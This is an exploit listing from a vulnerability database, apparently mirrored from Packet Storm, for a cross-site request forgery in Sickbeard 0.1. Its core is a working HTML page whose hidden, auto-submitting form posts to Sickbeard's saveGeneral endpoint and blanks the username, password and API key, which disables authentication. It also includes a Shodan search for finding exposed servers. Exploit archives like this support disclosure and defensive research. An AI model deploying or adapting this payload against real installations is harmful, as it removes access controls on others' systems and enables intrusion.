Lucene search
K

Sickbeard 0.1 Cross Site Request Forgery

🗓️ 27 Jul 2020 00:00:00Reported by bdrakeType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 468 Views

Sickbeard 0.1 Cross-Site Request Forgery vulnerability in disabling authenticatio

Code
`# Exploit Title: Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)  
# Google Dork: https://www.shodan.io/search?query=sickbeard  
# Date: 2020-06-06  
# Exploit Author: bdrake  
# Vendor Homepage: https://sickbeard.com/  
# Software Link: https://github.com/midgetspy/Sick-Beard  
# Version: alpha (master) -- git : 31ceaf1b5cab1884a280fe3f4609bdc3b1fb3121  
# Tested on: Fedora 32  
# CVE : NA  
  
<html>  
<body>  
<!--   
Clearing username and password disables authentication.  
Requires a server restart for changes to take effect.  
-->  
<form action="http://1ocalhost:8081/config/general/saveGeneral" method="POST">  
<input type="hidden" name="log_dir" value="Logs" />  
<input type="hidden" name="web_port" value="8081" />  
<input type="hidden" name="web_username" value="" />  
<input type="hidden" name="web_password" value="" />  
<input type="hidden" name="https_cert" value="server.crt" />  
<input type="hidden" name="https_key" value="server.key" />  
<input type="hidden" name="api_key" value="" />  
</form>  
<script>  
document.forms[0].submit();  
</script>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation